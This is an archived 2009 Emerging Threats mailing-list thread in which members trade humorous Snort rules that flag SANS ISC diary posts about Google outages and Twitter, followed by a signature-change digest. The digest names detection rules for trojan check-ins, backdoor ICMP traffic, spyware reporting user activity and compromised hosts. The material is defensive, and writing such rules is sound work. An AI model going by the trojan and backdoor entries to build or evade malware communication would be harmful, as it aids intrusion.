From flamdugen at hotmail.com  Fri May 15 11:06:16 2009
From: flamdugen at hotmail.com (John Jacobs)
Date: Fri, 15 May 2009 10:06:16 -0500
Subject: [Emerging-Sigs] Second Try; For review;
 ISC/Twitter/Google ET Sigs
In-Reply-To: <4A0D844A.70907@jonkmans.com>
References: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>
	<4A0D844A.70907@jonkmans.com>
Message-ID: <BLU148-W700BCC98F2252B154D0C9B45F0@phx.gbl>


Well that's annoying.  Hopefully this works:

Hello ET, first and foremost thank you for the strong effort and excellent signatures.  As such, in an attempt to give back to a wonderful community, I humbly submit the following Snort rules for inclusion into the ET signatures.  A brief explanation is provided below:

The first signature is designed to detect Google non-security related announcement articles on the ISC Diary; this seems to be a topic of extreme interest for some ISC Handlers despite having little to no security value.  I am unsure if this is a result of "Slow News Day" syndrome or another behavioral oddity which manifests at ISC.  This will detect on "Google is slow" style articles as well, however, I am sure this signature will require more tweaking as ISC encourages handing over more personal data to a 3rd party under the guise of functionality.

The second signature is designed to detect Joel peddling Twitter on the isc.sans.org Diary, as again, this isn't security related.  I suspect the Twitter signature may tend to fire more than the Google as Joel tends to get excited about "Tweeting" and "Twittering" and this spills over into the ISC Diary anytime he's the "Handler on Duty".

As always, please feel free to make changes to this signatures, especially regarding performance.  I've placed these into ET POLICY but they may be more applicable in another classes, perhaps a blocking class. I thank you in advance, feel free to modify for PCRE as well.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert; flow:established,to_server; content:"|0D 0A|Host|3A 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/; classtype:policy-violation; sid:2009xxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans; flow:established,from_server; content:"google"; nocase; content:"slow"; nocase; reference:url,isc.sans.org/diary.html?storyid=6388; reference:url,isc.sans.org/diary.html?storyid=5443; classtype:policy-annoyance; sid:2009xxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans; flow:established,from_server; content:"Joel|20|Esler"; nocase; content:"Twitter"; nocase; reference:url,isc.sans.org/diary.html?storyid=6391; reference:url,isc.sans.org/diary.html?storyid=6388; classtype:policy-annoyance; sid:2009xxxx; rev:1;)

- John Jacobs
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090515/ddf462c7/attachment.html

From jonkman at jonkmans.com  Fri May 15 11:19:10 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 15 May 2009 11:19:10 -0400
Subject: [Emerging-Sigs] Second Try; For review;
 ISC/Twitter/Google ET Sigs
In-Reply-To: <BLU148-W700BCC98F2252B154D0C9B45F0@phx.gbl>
References: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>	<4A0D844A.70907@jonkmans.com>
	<BLU148-W700BCC98F2252B154D0C9B45F0@phx.gbl>
Message-ID: <4A0D87EE.7090104@jonkmans.com>

Hahaha!! Joel does have a twitter addiction doesn't he?

I think we'll just have to leave these sigs out there for personal use
if you see fit.

Quite funny though! Thanks for the chuckle

Matt

John Jacobs wrote:
> Well that's annoying.  Hopefully this works:
> 
> Hello ET, first and foremost thank you for the strong effort and
> excellent signatures.  As such, in an attempt to give back to a
> wonderful community, I humbly submit the following Snort rules for
> inclusion into the ET signatures.  A brief explanation is provided below:
> 
> The first signature is designed to detect Google non-security related
> announcement articles on the ISC Diary; this seems to be a topic of
> extreme interest for some ISC Handlers despite having little to no
> security value.  I am unsure if this is a result of "Slow News Day"
> syndrome or another behavioral oddity which manifests at ISC.  This will
> detect on "Google is slow" style articles as well, however, I am sure
> this signature will require more tweaking as ISC encourages handing over
> more personal data to a 3rd party under the guise of functionality.
> 
> The second signature is designed to detect Joel peddling Twitter on the
> isc.sans.org Diary, as again, this isn't security related.  I suspect
> the Twitter signature may tend to fire more than the Google as Joel
> tends to get excited about "Tweeting" and "Twittering" and this spills
> over into the ISC Diary anytime he's the "Handler on Duty".
> 
> As always, please feel free to make changes to this signatures,
> especially regarding performance.  I've placed these into ET POLICY but
> they may be more applicable in another classes, perhaps a blocking
> class. I thank you in advance, feel free to modify for PCRE as well.
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
> flow:established,to_server; content:"|0D 0A|Host|3A
> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
> classtype:policy-violation; sid:2009xxxx; rev:1;)
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
> flow:established,from_server; content:"google"; nocase; content:"slow";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
> reference:url,isc.sans.org/diary.html?storyid=5443;
> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
> flow:established,from_server; content:"Joel|20|Esler"; nocase;
> content:"Twitter"; nocase;
> reference:url,isc.sans.org/diary.html?storyid=6391;
> reference:url,isc.sans.org/diary.html?storyid=6388;
> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
> 
> - John Jacobs
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From eslerj at gmail.com  Fri May 15 11:36:58 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 15 May 2009 11:36:58 -0400
Subject: [Emerging-Sigs] Second Try; For review;
	ISC/Twitter/Google ET 	Sigs
In-Reply-To: <4A0D87EE.7090104@jonkmans.com>
References: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>
	<4A0D844A.70907@jonkmans.com>
	<BLU148-W700BCC98F2252B154D0C9B45F0@phx.gbl>
	<4A0D87EE.7090104@jonkmans.com>
Message-ID: <314cf0830905150836r452cfa0fj69cf1cb9d4a8a2c3@mail.gmail.com>

Twitter simply is a fast way of getting immediate feedback from
readers/users.  Yesterday it came in particularly handy as many
couldn't get to their email to see what was going on on lists like the
Nanog and Outages.  Our primary means of realtime communications
remains to be IRC, however, a large portion of the readers of the ISC
can't get to IRC from work.

While funny, you make an interesting point, and I realize this may be
quite annoying to some readers, and I'll tone it down.

As far as covering stuff that is "non security related" like Google
being down -- well, when 5% of the internet that people use everyday,
all day, that becomes of interest to our users.  The Internet Storm
Center is mostly security related, I agree, however, it covers the
Internet has a whole.  Something as big as Google going down cannot be
ignored.

On the plus side, your signatures are extremely well written, follow
proper format, would execute fast, and have flowbits in the correct
spots.  The only suggestion I could make is perhaps instead of an
"alert" rule, you may want to change these to drop, as you probably
wouldn't want to be alerted to Twitter drivel, and instead flush these
packets to /dev/null.

--
J

On Fri, May 15, 2009 at 11:19 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> Hahaha!! Joel does have a twitter addiction doesn't he?
>
> I think we'll just have to leave these sigs out there for personal use
> if you see fit.
>
> Quite funny though! Thanks for the chuckle
>
> Matt
>
> John Jacobs wrote:
>> Well that's annoying. ?Hopefully this works:
>>
>> Hello ET, first and foremost thank you for the strong effort and
>> excellent signatures. ?As such, in an attempt to give back to a
>> wonderful community, I humbly submit the following Snort rules for
>> inclusion into the ET signatures. ?A brief explanation is provided below:
>>
>> The first signature is designed to detect Google non-security related
>> announcement articles on the ISC Diary; this seems to be a topic of
>> extreme interest for some ISC Handlers despite having little to no
>> security value. ?I am unsure if this is a result of "Slow News Day"
>> syndrome or another behavioral oddity which manifests at ISC. ?This will
>> detect on "Google is slow" style articles as well, however, I am sure
>> this signature will require more tweaking as ISC encourages handing over
>> more personal data to a 3rd party under the guise of functionality.
>>
>> The second signature is designed to detect Joel peddling Twitter on the
>> isc.sans.org Diary, as again, this isn't security related. ?I suspect
>> the Twitter signature may tend to fire more than the Google as Joel
>> tends to get excited about "Tweeting" and "Twittering" and this spills
>> over into the ISC Diary anytime he's the "Handler on Duty".
>>
>> As always, please feel free to make changes to this signatures,
>> especially regarding performance. ?I've placed these into ET POLICY but
>> they may be more applicable in another classes, perhaps a blocking
>> class. I thank you in advance, feel free to modify for PCRE as well.
>>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
>> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
>> flow:established,to_server; content:"|0D 0A|Host|3A
>> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
>> classtype:policy-violation; sid:2009xxxx; rev:1;)
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
>> flow:established,from_server; content:"google"; nocase; content:"slow";
>> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
>> reference:url,isc.sans.org/diary.html?storyid=5443;
>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
>> flow:established,from_server; content:"Joel|20|Esler"; nocase;
>> content:"Twitter"; nocase;
>> reference:url,isc.sans.org/diary.html?storyid=6391;
>> reference:url,isc.sans.org/diary.html?storyid=6388;
>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>
>> - John Jacobs
>>
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From eslerj at gmail.com  Fri May 15 11:47:06 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 15 May 2009 11:47:06 -0400
Subject: [Emerging-Sigs] Second Try; For review;
	ISC/Twitter/Google ET 	Sigs
In-Reply-To: <314cf0830905150836r452cfa0fj69cf1cb9d4a8a2c3@mail.gmail.com>
References: <BLU148-W354C8EB7B454BA548130C3B45F0@phx.gbl>
	<4A0D844A.70907@jonkmans.com>
	<BLU148-W700BCC98F2252B154D0C9B45F0@phx.gbl>
	<4A0D87EE.7090104@jonkmans.com>
	<314cf0830905150836r452cfa0fj69cf1cb9d4a8a2c3@mail.gmail.com>
Message-ID: <314cf0830905150847o16ae4ce0w5fc51424722df580@mail.gmail.com>

Sorry, just one more thing.

I would probably not recommend running these signatures as they may
cause a denial of service whenever I am duty.

Just a thought.

J

On Fri, May 15, 2009 at 11:36 AM, Joel Esler <eslerj at gmail.com> wrote:
> Twitter simply is a fast way of getting immediate feedback from
> readers/users. ?Yesterday it came in particularly handy as many
> couldn't get to their email to see what was going on on lists like the
> Nanog and Outages. ?Our primary means of realtime communications
> remains to be IRC, however, a large portion of the readers of the ISC
> can't get to IRC from work.
>
> While funny, you make an interesting point, and I realize this may be
> quite annoying to some readers, and I'll tone it down.
>
> As far as covering stuff that is "non security related" like Google
> being down -- well, when 5% of the internet that people use everyday,
> all day, that becomes of interest to our users. ?The Internet Storm
> Center is mostly security related, I agree, however, it covers the
> Internet has a whole. ?Something as big as Google going down cannot be
> ignored.
>
> On the plus side, your signatures are extremely well written, follow
> proper format, would execute fast, and have flowbits in the correct
> spots. ?The only suggestion I could make is perhaps instead of an
> "alert" rule, you may want to change these to drop, as you probably
> wouldn't want to be alerted to Twitter drivel, and instead flush these
> packets to /dev/null.
>
> --
> J
>
> On Fri, May 15, 2009 at 11:19 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>> Hahaha!! Joel does have a twitter addiction doesn't he?
>>
>> I think we'll just have to leave these sigs out there for personal use
>> if you see fit.
>>
>> Quite funny though! Thanks for the chuckle
>>
>> Matt
>>
>> John Jacobs wrote:
>>> Well that's annoying. ?Hopefully this works:
>>>
>>> Hello ET, first and foremost thank you for the strong effort and
>>> excellent signatures. ?As such, in an attempt to give back to a
>>> wonderful community, I humbly submit the following Snort rules for
>>> inclusion into the ET signatures. ?A brief explanation is provided below:
>>>
>>> The first signature is designed to detect Google non-security related
>>> announcement articles on the ISC Diary; this seems to be a topic of
>>> extreme interest for some ISC Handlers despite having little to no
>>> security value. ?I am unsure if this is a result of "Slow News Day"
>>> syndrome or another behavioral oddity which manifests at ISC. ?This will
>>> detect on "Google is slow" style articles as well, however, I am sure
>>> this signature will require more tweaking as ISC encourages handing over
>>> more personal data to a 3rd party under the guise of functionality.
>>>
>>> The second signature is designed to detect Joel peddling Twitter on the
>>> isc.sans.org Diary, as again, this isn't security related. ?I suspect
>>> the Twitter signature may tend to fire more than the Google as Joel
>>> tends to get excited about "Tweeting" and "Twittering" and this spills
>>> over into the ISC Diary anytime he's the "Handler on Duty".
>>>
>>> As always, please feel free to make changes to this signatures,
>>> especially regarding performance. ?I've placed these into ET POLICY but
>>> they may be more applicable in another classes, perhaps a blocking
>>> class. I thank you in advance, feel free to modify for PCRE as well.
>>>
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
>>> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
>>> flow:established,to_server; content:"|0D 0A|Host|3A
>>> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
>>> classtype:policy-violation; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"google"; nocase; content:"slow";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
>>> reference:url,isc.sans.org/diary.html?storyid=5443;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"Joel|20|Esler"; nocase;
>>> content:"Twitter"; nocase;
>>> reference:url,isc.sans.org/diary.html?storyid=6391;
>>> reference:url,isc.sans.org/diary.html?storyid=6388;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> - John Jacobs
>>>
>>>
>>> ------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
| http://twitter.com/joelesler

From steve.mcluuf at gmail.com  Fri May 15 13:02:23 2009
From: steve.mcluuf at gmail.com (Steve McLuuf)
Date: Fri, 15 May 2009 12:02:23 -0500
Subject: [Emerging-Sigs] Second Try; For review;
	ISC/Twitter/Google ET 	Sigs
Message-ID: <5c7e31c0905151002t61955ebcu1ce0f9fa1549bea1@mail.gmail.com>

Excellent idea and corresponding sigs.  One thing that troubles me is that
these can be evaded by not including a Host header which will prevent the
flowbit from being set.    So these won't trip for HTTP 1.0 clients.  I say
we keep these sigs but add HTTP 1.0 compatible ones as well.  The idea is to
identify the data as the ISC diary by looking for certain static content.
Maybe we can get the handlers to add a unique but static character string or
something to the diary page(s) so we can not have false positives.  For now,
I'm just making assumptions as to what is static on the ISC diary page(s).
The static content I'm matching on is only on the diary "main" page, not
necessarily an individual diary entry page.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
isc.sans.org Joel Esler Peddling Twitter"; flow:established,from_server;
content:"|3C|title|3E|SANS Internet Storm Center|3B| Cooperative Network
Security Community |2D| Internet Security |2D| isc |3C 2F|title|3E|";
nocase; content:"diary"; nocase; content:"Joel|20|Esler"; nocase;
content:"Twitter"; nocase; reference:url,
isc.sans.org/diary.html?storyid=6391; reference:url,
isc.sans.org/diary.html?storyid=6388; classtype:policy-annoyance;
sid:2009xxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
isc.sans.org SANdlers say Google is slow"; flow:established,from_server;
content:"|3C|title|3E|SANS Internet Storm Center|3B| Cooperative Network
Security Community |2D| Internet Security |2D| isc |3C2F|title|3E|"; nocase;
content:"diary"; nocase; content:"google"; nocase; content:"slow"; nocase;
reference:url,isc.sans.org/diary.html?storyid=6388; reference:url,
isc.sans.org/diary.html?storyid=5443; classtype:policy-annoyance;
sid:2009xxxx; rev:1;)

Finally, I found the reference to "SANdlers" funny.  Do people really use
that term?

-Steve

On Fri, May 15, 2009 at 11:36 AM, Joel Esler <eslerj at gmail.com> wrote:
> Twitter simply is a fast way of getting immediate feedback from
> readers/users.  Yesterday it came in particularly handy as many
> couldn't get to their email to see what was going on on lists like the
> Nanog and Outages.  Our primary means of realtime communications
> remains to be IRC, however, a large portion of the readers of the ISC
> can't get to IRC from work.
>
> While funny, you make an interesting point, and I realize this may be
> quite annoying to some readers, and I'll tone it down.
>
> As far as covering stuff that is "non security related" like Google
> being down -- well, when 5% of the internet that people use everyday,
> all day, that becomes of interest to our users.  The Internet Storm
> Center is mostly security related, I agree, however, it covers the
> Internet has a whole.  Something as big as Google going down cannot be
> ignored.
>
> On the plus side, your signatures are extremely well written, follow
> proper format, would execute fast, and have flowbits in the correct
> spots.  The only suggestion I could make is perhaps instead of an
> "alert" rule, you may want to change these to drop, as you probably
> wouldn't want to be alerted to Twitter drivel, and instead flush these
> packets to /dev/null.
>
> --
> J
>
> On Fri, May 15, 2009 at 11:19 AM, Matt Jonkman <jonkman at jonkmans.com>
wrote:
>> Hahaha!! Joel does have a twitter addiction doesn't he?
>>
>> I think we'll just have to leave these sigs out there for personal use
>> if you see fit.
>>
>> Quite funny though! Thanks for the chuckle
>>
>> Matt
>>
>> John Jacobs wrote:
>>> Well that's annoying.  Hopefully this works:
>>>
>>> Hello ET, first and foremost thank you for the strong effort and
>>> excellent signatures.  As such, in an attempt to give back to a
>>> wonderful community, I humbly submit the following Snort rules for
>>> inclusion into the ET signatures.  A brief explanation is provided
below:
>>>
>>> The first signature is designed to detect Google non-security related
>>> announcement articles on the ISC Diary; this seems to be a topic of
>>> extreme interest for some ISC Handlers despite having little to no
>>> security value.  I am unsure if this is a result of "Slow News Day"
>>> syndrome or another behavioral oddity which manifests at ISC.  This will
>>> detect on "Google is slow" style articles as well, however, I am sure
>>> this signature will require more tweaking as ISC encourages handing over
>>> more personal data to a 3rd party under the guise of functionality.
>>>
>>> The second signature is designed to detect Joel peddling Twitter on the
>>> isc.sans.org Diary, as again, this isn't security related.  I suspect
>>> the Twitter signature may tend to fire more than the Google as Joel
>>> tends to get excited about "Tweeting" and "Twittering" and this spills
>>> over into the ISC Diary anytime he's the "Handler on Duty".
>>>
>>> As always, please feel free to make changes to this signatures,
>>> especially regarding performance.  I've placed these into ET POLICY but
>>> they may be more applicable in another classes, perhaps a blocking
>>> class. I thank you in advance, feel free to modify for PCRE as well.
>>>
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY
>>> isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert;
>>> flow:established,to_server; content:"|0D 0A|Host|3A
>>> 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/;
>>> classtype:policy-violation; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"google"; nocase; content:"slow";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6388;
>>> reference:url,isc.sans.org/diary.html?storyid=5443;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY
>>> isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans;
>>> flow:established,from_server; content:"Joel|20|Esler"; nocase;
>>> content:"Twitter"; nocase;
>>> reference:url,isc.sans.org/diary.html?storyid=6391;
>>> reference:url,isc.sans.org/diary.html?storyid=6388;
>>> classtype:policy-annoyance; sid:2009xxxx; rev:1;)
>>>
>>> - John Jacobs
>>>
>>>
>>> ------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090515/5d2e9289/attachment.html

From emerging at emergingthreats.net  Fri May 15 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 15 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090515200010.932374504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Fri May 15 16:00:10 2009 [***]

[///]     Modified active rules:     [///]

 2009349 - ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules)


[---]         Disabled rules:        [---]

 2009130 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Request (emerging-virus.rules)
 2009131 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Response (emerging-virus.rules)


[---]         Removed rules:         [---]

 2003642 - ET TROJAN Downloader.Affill User Agent Detected (lol) (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (29):
        2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500145 || ET COMPROMISED Known Compromised or Hostile Host Traffic (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500146 || ET COMPROMISED Known Compromised or Hostile Host Traffic (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500147 || ET COMPROMISED Known Compromised or Hostile Host Traffic (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500148 || ET COMPROMISED Known Compromised or Hostile Host Traffic (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500149 || ET COMPROMISED Known Compromised or Hostile Host Traffic (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510145 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510146 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510147 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510148 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510149 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (29):
        2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500145 || ET COMPROMISED Known Compromised or Hostile Host Traffic (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500146 || ET COMPROMISED Known Compromised or Hostile Host Traffic (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500147 || ET COMPROMISED Known Compromised or Hostile Host Traffic (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500148 || ET COMPROMISED Known Compromised or Hostile Host Traffic (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500149 || ET COMPROMISED Known Compromised or Hostile Host Traffic (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
